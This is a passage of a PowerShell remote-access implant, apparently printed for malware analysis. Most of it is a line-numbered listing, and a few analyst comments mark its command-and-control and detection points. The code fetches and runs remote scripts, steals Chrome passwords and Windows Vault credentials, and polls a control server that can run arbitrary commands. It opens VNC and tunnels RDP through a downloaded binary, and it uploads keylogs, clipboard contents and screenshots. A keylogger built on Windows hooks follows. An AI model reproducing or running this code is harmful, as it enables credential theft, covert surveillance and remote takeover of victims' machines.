                    return "null"
                }



                $dataType = $value.GetType().Name

                switch -regex ($dataType) {
                    'String' {
                        return "`"{0}`"" -f (Escape-JSONString $value )
                    }
                    '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
                    'Int32|Double' {return "$value"}
                    'Boolean' {return "$value".ToLower()}
                    '(System\.)?Object\[\]' { # array

                        if ($maxDepth -le 0){return "`"$value`""}

                        $jsonResult = ''
                        foreach($elem in $value){
                            #if ($elem -eq $null) {continue}
                            if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
                            $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
                        }
                        return "[" + $jsonResult + "]"
                    }
                    '(System\.)?Hashtable' { # hashtable
                        $jsonResult = ''
                        foreach($key in $value.Keys){
                            if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
                            $jsonResult +=
@"
"{0}": {1}
"@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
                        }
                        return "{" + $jsonResult + "}"
                    }
                    default { #object
                        if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}

                        return "{" +
                        (($value | Get-Member -MemberType *property | % {
@"
"{0}": {1}
"@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )

                        }) -join ', ') + "}"
                    }
                }
            }
        }

        # Job arguments, in -ArgumentList order.
        $url = $args[0]

        $resolution = $args[1]
        $domain = $args[2]
        $computer_name = $args[3]
        $username = $args[4]
        $timezone = $args[5]
        $hashid = $args[6]
        $version = $args[7]


        # TLS certificate validation is disabled in this job's runspace as well.
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        # Second-stage download-and-execute via cmd.exe -> 64-bit powershell.exe:
        # disables certificate checks, IEX-runs a script fetched from the
        # hard-coded C2 (name=chrome), stops every chrome process, waits 3 s and
        # calls Get-ChromeDump (expected from that script; not in this listing)
        # to write %TEMP%\chrome.log. Detection point: the cmd.exe -> powershell.exe
        # command line containing "IEX (New-Object Net.WebClient).DownloadString(".
        & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=chrome'); Stop-Process -name chrome -ErrorAction SilentlyContinue; Start-sleep -seconds 3; Get-ChromeDump -OutFile $env:temp\chrome.log; Exit"
        # Fixed wait for the child to finish writing the dump.
        Start-Sleep -Seconds 60
        # Upload: dump read as text, base64-encoded, wrapped in the usual JSON
        # envelope with "type" = "chbrwpwd" and POSTed to C2 "/pshlog". The
        # write-host and bare-expression lines are leftover debug output.
        # No try/catch: a failed POST terminates the job.
        If (Test-Path "$env:temp\chrome.log") {
            #$content = [IO.File]::ReadAllText("$env:temp\chrome.log")
            $content = Get-Content "$env:temp\chrome.log" | Out-String
            $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content))
            $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "chbrwpwd"}
            $log_json = $json | ConvertTo-Json
            $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
            write-host $buffer
            $url+'/pshlog'
            [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+'/pshlog')
            $webRequest.ContentType = "application/json"
            $webRequest.Timeout = 10000
            $webRequest.Method = "POST"
            $webRequest.ContentLength = $buffer.Length;


            $requestStream = $webRequest.GetRequestStream()
            $requestStream.Write($buffer, 0, $buffer.Length)
            $requestStream.Flush()
            $requestStream.Close()

            [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
            $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
            $result = $streamReader.ReadToEnd()
        }
    } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version
}

692 | function GetVault { | |
693 | Start-Job -ScriptBlock { | |
694 | function Escape-JSONString($str){ | |
695 | if ($str -eq $null) {return ""} | |
696 | $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t') | |
697 | return $str; | |
698 | } | |
699 | ||
700 | function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) { | |
701 | begin { | |
702 | $data = @() | |
703 | } | |
704 | process{ | |
705 | $data += $_ | |
706 | } | |
707 | ||
708 | end{ | |
709 | ||
710 | if ($data.length -eq 1 -and $forceArray -eq $false) { | |
711 | $value = $data[0] | |
712 | } else { | |
713 | $value = $data | |
714 | } | |
715 | ||
716 | if ($value -eq $null) { | |
717 | return "null" | |
718 | } | |
719 | ||
720 | ||
721 | ||
722 | $dataType = $value.GetType().Name | |
723 | ||
724 | switch -regex ($dataType) { | |
725 | 'String' { | |
726 | return "`"{0}`"" -f (Escape-JSONString $value ) | |
727 | } | |
728 | '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value} | |
729 | 'Int32|Double' {return "$value"} | |
730 | 'Boolean' {return "$value".ToLower()} | |
731 | '(System\.)?Object\[\]' { # array | |
732 | ||
733 | if ($maxDepth -le 0){return "`"$value`""} | |
734 | ||
735 | $jsonResult = '' | |
736 | foreach($elem in $value){ | |
737 | #if ($elem -eq $null) {continue} | |
738 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
739 | $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1)) | |
740 | } | |
741 | return "[" + $jsonResult + "]" | |
742 | } | |
743 | '(System\.)?Hashtable' { # hashtable | |
744 | $jsonResult = '' | |
745 | foreach($key in $value.Keys){ | |
746 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
747 | $jsonResult += | |
748 | @" | |
749 | "{0}": {1} | |
750 | "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
751 | } | |
752 | return "{" + $jsonResult + "}" | |
753 | } | |
754 | default { #object | |
755 | if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)} | |
756 | ||
757 | return "{" + | |
758 | (($value | Get-Member -MemberType *property | % { | |
759 | @" | |
760 | "{0}": {1} | |
761 | "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
762 | ||
763 | }) -join ', ') + "}" | |
764 | } | |
765 | } | |
766 | } | |
767 | } | |
768 | ||
769 | $url = $args[0] | |
770 | $resolution = $args[1] | |
771 | $domain = $args[2] | |
772 | $computer_name = $args[3] | |
773 | $username = $args[4] | |
774 | $timezone = $args[5] | |
775 | $hashid = $args[6] | |
776 | $version = $args[7] | |
777 | $vault_url = $url+'/script?id=random&name=vault' | |
778 | Write-host $vault_url | |
779 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
780 | IEX (New-Object Net.WebClient).DownloadString($vault_url); Get-VaultCredential -OutVariable vaultcreds -ErrorAction SilentlyContinue | |
781 | #Write-host 'ERROR' | |
782 | #$vaultcredserror | |
783 | $vaultcreds = $vaultcreds | Out-String | |
784 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($vaultcreds)) | |
785 | if ($content.length -ne 0) { | |
786 | $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "vault"} | |
787 | $json | |
788 | $log_json = $json | ConvertTo-Json | |
789 | ||
790 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
791 | write-host $buffer | |
792 | ||
793 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+'/pshlog') | |
794 | $webRequest.ContentType = "application/json" | |
795 | $webRequest.Timeout = 10000 | |
796 | $webRequest.Method = "POST" | |
797 | $webRequest.ContentLength = $buffer.Length; | |
798 | ||
799 | ||
800 | $requestStream = $webRequest.GetRequestStream() | |
801 | $requestStream.Write($buffer, 0, $buffer.Length) | |
802 | $requestStream.Flush() | |
803 | $requestStream.Close() | |
804 | ||
805 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
806 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
807 | $result = $streamReader.ReadToEnd() | |
808 | } | |
809 | ||
810 | } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version | |
811 | } | |
812 | ||
813 | ||
814 | function WebGet { | |
815 | Start-Job -ScriptBlock { | |
816 | $url = $args[0] | |
817 | $resolution = $args[1] | |
818 | $domain = $args[2] | |
819 | $computer_name = $args[3] | |
820 | $username = $args[4] | |
821 | $timezone = $args[5] | |
822 | $hashid = $args[6] | |
823 | $version = $args[7] | |
824 | while ($true) { | |
825 | $WebClient=New-Object net.webclient | |
826 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
827 | $String=$WebClient.DownloadString($url+"/command?domain=$domain&username=$username&hashid=$hashid&computer_name=$computer_name&ver=$version") | |
828 | if ($String -ne '0') { | |
829 | foreach ($cmd in ($string -split '["\n\r"|"\r\n"|\n|\r]')) { | |
830 | if ($cmd.StartsWith("+screenshot",1)) { $cmd | Out-File $env:temp\keywords.txt } | |
831 | elseif ($cmd.StartsWith("-screenshot",1)) { Remove-Item $env:temp\keywords.txt } | |
832 | elseif ($cmd.StartsWith("+vnc", 1)) { | |
833 | if([IntPtr]::Size -eq 8) { | |
834 | & cmd /c %systemroot%\syswow64\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('$url/script?id=1&name=vnc');" | |
835 | } | |
836 | else { & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('$url/script?id=1&name=vnc');" } | |
837 | } | |
838 | # +rdp username;password;trigger-port;10.0.0.1 | |
839 | elseif ($cmd.StartsWith("+rdp", 1)) { | |
840 | $creds = ($cmd.split(' '))[1] | |
841 | $plink_username = ($creds.split(';'))[0] | |
842 | $plink_password = ($creds.split(';'))[1] | |
843 | $plink_trigger_port = ($creds.split(';'))[2] | |
844 | $plink_ip = ($creds.split(';'))[3] | |
845 | $plink_username, $plink_password, $plink_trigger_port, $plink_ip | |
846 | Start-Job -ScriptBlock { | |
847 | #IF ((Test-Path "$env:temp\plink.exe") -eq $False) { (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/x86/plink.exe', "$env:temp\plink.exe");} | |
848 | IF ((Test-Path "$env:temp\stnlc.exe") -eq $False) | |
849 | { | |
850 | (New-Object System.Net.WebClient).DownloadFile('http://sylviabodenheimer.ch/css/stnlc.bin', "$env:temp\stnlc.exe") | |
851 | (New-Object System.Net.WebClient).DownloadFile('http://sylviabodenheimer.ch/css/CiWinCng32.dll', "$env:temp\CiWinCng32.dll") | |
852 | } | |
853 | $plink_username = $args[0] | |
854 | $plink_password = $args[1] | |
855 | $plink_trigger_port = $args[2] | |
856 | $plink_ip = $args[3] | |
857 | Stop-Process -name stnlc -ErrorAction SilentlyContinue | |
858 | #& cmd /c "echo yes | $env:temp\plink.exe -R "+$plink_trigger_port+":127.0.0.1:3389 -l $plink_username -pw $plink_password $plink_ip -N" } -ArgumentList $plink_username, $plink_password, $plink_trigger_port, $plink_ip } | |
859 | & cmd /c "echo S | $env:temp\stnlc.exe $plink_username@$plink_ip -s2c=0.0.0.0,$plink_trigger_port,localhost,3389 -pw=$plink_password" | |
860 | & cmd /c "$env:temp\stnlc.exe $plink_username@$plink_ip -s2c=0.0.0.0,$plink_trigger_port,localhost,3389 -pw=$plink_password -unat=y" | |
861 | } -ArgumentList $plink_username, $plink_password, $plink_trigger_port, $plink_ip } | |
862 | elseif ($cmd -ne '') { Start-Job -ScriptBlock {& cmd /c $args[0]} -ArgumentList $cmd | |
863 | Write-Host $args[0] | |
864 | ||
865 | }}} | |
866 | $WebGetTimer = 1200 | |
867 | Start-Sleep -Seconds $WebGetTimer | |
868 | } | |
869 | } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version | |
870 | } | |
871 | ||
872 | function PostFile($file_name) { | |
873 | $name = (Get-ChildItem $file_name).name | |
874 | $bytes = [System.IO.File]::ReadAllBytes($file_name) | |
875 | $enc = [System.Text.Encoding]::GetEncoding($codePageName) | |
876 | $data = $enc.GetString($bytes) | |
877 | ||
878 | [System.Net.WebRequest]$webRequest = [System.Net.WebRequest]::Create($params.url+'/pshscr') | |
879 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
880 | $webRequest.ContentType = "image/jpeg" | |
881 | $webRequest.Method = "POST" | |
882 | [byte[]]$bytes = $enc.GetBytes($data); | |
883 | $webRequest.ContentLength = $bytes.Length; | |
884 | $webRequest.Headers.add('content-disposition', "file=$name") | |
885 | $webRequest.Headers.add('hashid', $params.hashid) | |
886 | $webRequest.Headers.add('computer_name', $params.computer_name) | |
887 | $webRequest.Headers.add('domain', $params.domain) | |
888 | $webRequest.Headers.add('username', $params.username) | |
889 | [System.IO.Stream]$reqStream = $webRequest.GetRequestStream() | |
890 | $reqStream.Write($bytes, 0, $bytes.Length); | |
891 | $reqStream.Flush(); | |
892 | ||
893 | $resp = $webRequest.GetResponse(); | |
894 | $rs = $resp.GetResponseStream(); | |
895 | [System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $rs; | |
896 | $sr.ReadToEnd(); | |
897 | ||
898 | } | |
899 | ||
900 | ||
901 | ||
902 | function WebPost { | |
903 | $pshlog_url = $params.url+"/pshlog" | |
904 | while ($true) { | |
905 | $WebPostTimer = 1200 | |
906 | Start-Sleep -Seconds $WebPostTimer | |
907 | Write-host $params.log_file | |
908 | If (Test-Path $log_file) { | |
909 | #$content = [IO.File]::ReadAllText($params.log_file) | |
910 | $aaa = Get-Content $params.log_file | |
911 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aaa)) | |
912 | $json = @{"resolution" = $params.resolution; "domain" = $params.domain; "computer_name" = $params.computer_name; "username" = $params.username; "timezone" = $params.timezone; "hashid" = $params.hashid; "version" = $params.version; "content" = $content; "type" = "keylog"} | |
913 | $log_json = $json | ConvertTo-Json | |
914 | Write-Host $log_json | |
915 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
916 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($pshlog_url) | |
917 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
918 | $webRequest.ContentType = "application/json" | |
919 | $webRequest.Timeout = 10000 | |
920 | $webRequest.Method = "POST" | |
921 | $webRequest.ContentLength = $buffer.Length; | |
922 | ||
923 | ||
924 | $requestStream = $webRequest.GetRequestStream() | |
925 | $requestStream.Write($buffer, 0, $buffer.Length) | |
926 | $requestStream.Flush() | |
927 | $requestStream.Close() | |
928 | ||
929 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
930 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
931 | $result = $streamReader.ReadToEnd() | |
932 | Remove-Item $log_file | |
933 | } | |
934 | if (Test-Path "$env:Temp\Applnsights_VisualStudio.txt") { | |
935 | ||
936 | $clipfile = "$env:Temp\Applnsights_VisualStudio.txt" | |
937 | $aaa = Get-Content $clipfile | Out-String | |
938 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aaa)) | |
939 | ||
940 | $json = @{"resolution" = $params.resolution; "domain" = $params.domain; "computer_name" = $params.computer_name; "username" = $params.username; "timezone" = $params.timezone; "hashid" = $params.hashid; "version" = $params.version; "content" = $content; "type" = "clipboard"} | |
941 | $log_json = $json | ConvertTo-Json | |
942 | write-host $log_json | |
943 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
944 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create("$pshlog_url") | |
945 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
946 | $webRequest.ContentType = "application/json" | |
947 | $webRequest.Timeout = 10000 | |
948 | $webRequest.Method = "POST" | |
949 | $webRequest.ContentLength = $buffer.Length; | |
950 | ||
951 | ||
952 | $requestStream = $webRequest.GetRequestStream() | |
953 | $requestStream.Write($buffer, 0, $buffer.Length) | |
954 | $requestStream.Flush() | |
955 | $requestStream.Close() | |
956 | ||
957 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
958 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
959 | $result = $streamReader.ReadToEnd() | |
960 | Remove-Item $clipfile | |
961 | } | |
962 | ||
963 | ||
964 | $directoryInfo = Get-ChildItem $ScreenshotPath | |
965 | If ($directoryInfo) { | |
966 | $directoryInfo | ForEach-Object { | |
967 | Write-Host $_.FullName | |
968 | PostFile($_.FullName) | |
969 | Remove-Item $_.FullName | |
970 | } | |
971 | } | |
972 | } | |
973 | } | |
974 | ||
975 | ||
976 | function Get-Keystrokes { | |
977 | <# | |
978 | .SYNOPSIS | |
979 | ||
980 | .PARAMETER LogPath | |
981 | ||
982 | Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log. | |
983 | ||
984 | .PARAMETER Timeout | |
985 | ||
986 | Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. | |
987 | ||
988 | .PARAMETER PassThru | |
989 | ||
990 | Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes. | |
991 | ||
992 | .EXAMPLE | |
993 | ||
994 | Get-Keystrokes -LogPath C:\key.log | |
995 | ||
996 | .EXAMPLE | |
997 | ||
998 | Get-Keystrokes -Timeout 20 | |
999 | ||
1000 | .LINK | |
1001 | ||
1002 | http://www.obscuresec.com/ | |
1003 | http://www.exploit-monday.com/ | |
1004 | https://github.com/secabstraction | |
1005 | https://github.com/ahhh/PSSE | |
1006 | ||
1007 | #> | |
1008 | [CmdletBinding()] | |
1009 | Param ( | |
1010 | [Parameter(Position = 0)] | |
1011 | [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})] | |
1012 | [String]$LogPath = "$($env:TEMP)\key.log", | |
1013 | ||
1014 | [Parameter(Position = 1)] | |
1015 | [Double]$Timeout, | |
1016 | ||
1017 | [Parameter()] | |
1018 | [Switch]$PassThru | |
1019 | ) | |
1020 | ||
1021 | $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) | |
1022 | ||
1023 | try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode } | |
1024 | catch { throw $_ } | |
1025 | ||
1026 | $Script = { | |
1027 | Param ( | |
1028 | [Parameter(Position = 0)] | |
1029 | [String]$LogPath, | |
1030 | ||
1031 | [Parameter(Position = 1)] | |
1032 | [Double]$Timeout | |
1033 | ) | |
1034 | ||
1035 | function local:Get-DelegateType { | |
1036 | Param ( | |
1037 | [OutputType([Type])] | |
1038 | ||
1039 | [Parameter( Position = 0)] | |
1040 | [Type[]] | |
1041 | $Parameters = (New-Object Type[](0)), | |
1042 | ||
1043 | [Parameter( Position = 1 )] | |
1044 | [Type] | |
1045 | $ReturnType = [Void] | |
1046 | ) | |
1047 | ||
1048 | $Domain = [AppDomain]::CurrentDomain | |
1049 | $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate') | |
1050 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) | |
1051 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) | |
1052 | $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
1053 | $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) | |
1054 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') | |
1055 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) | |
1056 | $MethodBuilder.SetImplementationFlags('Runtime, Managed') | |
1057 | ||
1058 | $TypeBuilder.CreateType() | |
1059 | } | |
1060 | function local:Get-ProcAddress { | |
1061 | Param ( | |
1062 | [OutputType([IntPtr])] | |
1063 | ||
1064 | [Parameter( Position = 0, Mandatory = $True )] | |
1065 | [String] | |
1066 | $Module, | |
1067 | ||
1068 | [Parameter( Position = 1, Mandatory = $True )] | |
1069 | [String] | |
1070 | $Procedure | |
1071 | ) | |
1072 | ||
1073 | # Get a reference to System.dll in the GAC | |
1074 | $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | | |
1075 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } | |
1076 | $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') | |
1077 | # Get a reference to the GetModuleHandle and GetProcAddress methods | |
1078 | $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') | |
1079 | $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') | |
1080 | # Get a handle to the module specified | |
1081 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) | |
1082 | $tmpPtr = New-Object IntPtr | |
1083 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) | |
1084 | ||
1085 | # Return the address of the function | |
1086 | $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) | |
1087 | } | |
1088 | ||
1089 | #region Imports | |
1090 | ||
1091 | [void][Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | |
1092 | ||
1093 | # SetWindowsHookEx | |
1094 | $SetWindowsHookExAddr = Get-ProcAddress user32.dll SetWindowsHookExA | |
1095 | $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr]) | |
1096 | $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate) | |
1097 | ||
1098 | # CallNextHookEx | |
1099 | $CallNextHookExAddr = Get-ProcAddress user32.dll CallNextHookEx | |
1100 | $CallNextHookExDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr], [IntPtr]) ([IntPtr]) | |
1101 | $CallNextHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CallNextHookExAddr, $CallNextHookExDelegate) | |
1102 | ||
1103 | # UnhookWindowsHookEx | |
1104 | $UnhookWindowsHookExAddr = Get-ProcAddress user32.dll UnhookWindowsHookEx | |
1105 | $UnhookWindowsHookExDelegate = Get-DelegateType @([IntPtr]) ([Void]) | |
1106 | $UnhookWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UnhookWindowsHookExAddr, $UnhookWindowsHookExDelegate) | |
1107 | ||
1108 | # PeekMessage | |
1109 | $PeekMessageAddr = Get-ProcAddress user32.dll PeekMessageA | |
1110 | $PeekMessageDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([Void]) | |
1111 | $PeekMessage = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PeekMessageAddr, $PeekMessageDelegate) | |
1112 | ||
1113 | # GetAsyncKeyState | |
1114 | $GetAsyncKeyStateAddr = Get-ProcAddress user32.dll GetAsyncKeyState | |
1115 | $GetAsyncKeyStateDelegate = Get-DelegateType @([Windows.Forms.Keys]) ([Int16]) | |
1116 | $GetAsyncKeyState = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAsyncKeyStateAddr, $GetAsyncKeyStateDelegate) | |
1117 | ||
1118 | # GetForegroundWindow | |
1119 | $GetForegroundWindowAddr = Get-ProcAddress user32.dll GetForegroundWindow | |
1120 | $GetForegroundWindowDelegate = Get-DelegateType @() ([IntPtr]) | |
1121 | $GetForegroundWindow = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetForegroundWindowAddr, $GetForegroundWindowDelegate) | |
1122 | ||
1123 | # GetWindowText | |
1124 | $GetWindowTextAddr = Get-ProcAddress user32.dll GetWindowTextA | |
1125 | $GetWindowTextDelegate = Get-DelegateType @([IntPtr], [Text.StringBuilder], [Int32]) ([Void]) | |
1126 | $GetWindowText = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetWindowTextAddr, $GetWindowTextDelegate) | |
1127 | ||
1128 | # GetModuleHandle | |
1129 | $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA | |
1130 | $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) | |
1131 | $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) | |
1132 | ||
1133 | #endregion Imports | |
1134 | ||
1135 | $CallbackScript = { | |
1136 | Param ( | |
1137 | [Parameter()] | |
1138 | [Int32]$Code, | |
1139 | ||
1140 | [Parameter()] | |
1141 | [IntPtr]$wParam, | |
1142 | ||
1143 | [Parameter()] | |
1144 | [IntPtr]$lParam | |
1145 | ) | |
1146 | ||
1147 | $Keys = [Windows.Forms.Keys] | |
1148 | ||
1149 | $MsgType = $wParam.ToInt32() | |
1150 | ||
1151 | # Process WM_KEYDOWN & WM_SYSKEYDOWN messages | |
1152 | if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) { | |
1153 | ||
1154 | $hWindow = $GetForegroundWindow.Invoke() | |
1155 | ||
1156 | $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey) | |
1157 | if (($ShiftState -band 0x8000) -eq 0x8000) { $Shift = $true } | |
1158 | else { $Shift = $false } | |
1159 | ||
1160 | $Caps = [Console]::CapsLock | |
1161 | ||
1162 | # Read virtual-key from buffer | |
1163 | $vKey = [Windows.Forms.Keys][Runtime.InteropServices.Marshal]::ReadInt32($lParam) | |
1164 | ||
1165 | # Parse virtual-key | |
1166 | if ($vKey -gt 64 -and $vKey -lt 91) { # Alphabet characters | |
1167 | if ($Shift -xor $Caps) { $Key = $vKey.ToString() } | |
1168 | else { $Key = $vKey.ToString().ToLower() } | |
1169 | } | |
1170 | elseif ($vKey -ge 96 -and $vKey -le 111) { # Number pad characters | |
1171 | switch ($vKey.value__) { | |
1172 | 96 { $Key = '0' } | |
1173 | 97 { $Key = '1' } | |
1174 | 98 { $Key = '2' } | |
1175 | 99 { $Key = '3' } | |
1176 | 100 { $Key = '4' } | |
1177 | 101 { $Key = '5' } | |
1178 | 102 { $Key = '6' } | |
1179 | 103 { $Key = '7' } | |
1180 | 104 { $Key = '8' } | |
1181 | 105 { $Key = '9' } | |
1182 | 106 { $Key = "*" } | |
1183 | 107 { $Key = "+" } | |
1184 | 108 { $Key = "|" } | |
1185 | 109 { $Key = "-" } | |
1186 | 110 { $Key = "." } | |
1187 | 111 { $Key = "/" } | |
1188 | } | |
1189 | } | |
1190 | elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) { | |
1191 | if ($Shift) { | |
1192 | switch ($vKey.value__) { # Shiftable characters | |
1193 | 48 { $Key = ')' } | |
1194 | 49 { $Key = '!' } | |
1195 | 50 { $Key = '@' } | |
1196 | 51 { $Key = '#' } | |
1197 | 52 { $Key = '$' } | |
1198 | 53 { $Key = '%' } | |
1199 | 54 { $Key = '^' } | |
1200 | 55 { $Key = '&' } | |
1201 | 56 { $Key = '*' } | |
1202 | 57 { $Key = '(' } | |
1203 | 186 { $Key = ':' } | |
1204 | 187 { $Key = '+' } | |
1205 | 188 { $Key = '<' } | |
1206 | 189 { $Key = '_' } | |
1207 | 190 { $Key = '>' } | |
1208 | 191 { $Key = '?' } | |
1209 | 192 { $Key = '~' } | |
1210 | 219 { $Key = '{' } | |
1211 | 220 { $Key = '|' } | |
1212 | 221 { $Key = '}' } | |
1213 | 222 { $Key = '<Double Quotes>' } | |
1214 | } | |
1215 | } | |
1216 | else { | |
1217 | switch ($vKey.value__) { | |
1218 | 48 { $Key = '0' } | |
1219 | 49 { $Key = '1' } | |
1220 | 50 { $Key = '2' } | |
1221 | 51 { $Key = '3' } | |
1222 | 52 { $Key = '4' } | |
1223 | 53 { $Key = '5' } | |
1224 | 54 { $Key = '6' } | |
1225 | 55 { $Key = '7' } | |
1226 | 56 { $Key = '8' } | |
1227 | 57 { $Key = '9' } | |
1228 | 186 { $Key = ';' } | |
1229 | 187 { $Key = '=' } | |
1230 | 188 { $Key = ',' } | |
1231 | 189 { $Key = '-' } | |
1232 | 190 { $Key = '.' } | |
1233 | 191 { $Key = '/' } | |
1234 | 192 { $Key = '`' } | |
1235 | 219 { $Key = '[' } | |
1236 | 220 { $Key = '\' } | |
1237 | 221 { $Key = ']' } | |
1238 | 222 { $Key = '<Single Quote>' } | |
1239 | } | |
1240 | } | |
1241 | } | |
1242 | else { | |
1243 | switch ($vKey) { | |
1244 | $Keys::F1 { $Key = '<F1>' } | |
1245 | $Keys::F2 { $Key = '<F2>' } | |
